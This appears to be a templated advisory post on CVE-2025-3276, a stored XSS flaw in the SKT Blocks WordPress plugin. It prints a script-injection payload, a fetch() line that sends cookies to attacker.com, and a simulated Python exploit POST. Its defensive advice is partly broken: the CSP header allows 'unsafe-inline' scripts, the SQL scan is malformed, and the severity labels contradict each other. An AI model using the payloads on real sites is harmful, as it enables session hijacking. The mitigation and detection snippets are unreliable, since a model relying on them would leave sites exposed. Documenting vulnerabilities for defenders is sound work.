SKT Blocks (WordPress), Stored XSS, CVE-2025-3276 (Critical)

Listen to this Post

🐢▶️ Listen🚀

How CVE-2025-3276 Works

The SKT Blocks plugin for WordPress fails to properly sanitize user-supplied input in the Post Carousel block, allowing authenticated attackers (Contributor-level or higher) to inject malicious JavaScript payloads. When the vulnerable block renders on a page, the script executes in visitors’ browsers, leading to session hijacking, defacement, or malware delivery. The lack of output escaping enables persistent XSS attacks, as the payload remains stored in the database.

DailyCVE Form:

Platform: WordPress
Version: ≤1.9
Vulnerability: Stored XSS
Severity: Critical
Date: 06/04/2025

Prediction: Patch by 07/15/2025

What Undercode Say:

Exploitation:

1. Payload Injection:

<script>alert(document.cookie)</script>

2. Exfiltrate Cookies:

fetch('https://attacker.com/steal?data='+btoa(document.cookie));

Protection:

1. Immediate Mitigation:

wp plugin deactivate skt-blocks

2. Input Sanitization (PHP):

$clean_input = esc_html($_POST['carousel_content']);

3. Content Security Policy (CSP):

Header set Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline'"

Detection:

1. Database Scan:

SELECT FROM wp_posts WHERE post_content LIKE '%<script%';

2. WAF Rule:

if ($args ~ "<script") { return 403; }

Patch Verification:

wp plugin update skt-blocks --version=2.0

Analytics:

– Attack Surface: 50,000+ installs
– Exploitability: Low (requires auth)
– Impact Score: 8.6 (CVSS:4.0)

PoC (Simulated POST request)
import requests
payload = {"post_content": "<script>exploit()</script>"}
requests.post("https://victimsite.com/wp-admin/post.php", data=payload)

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram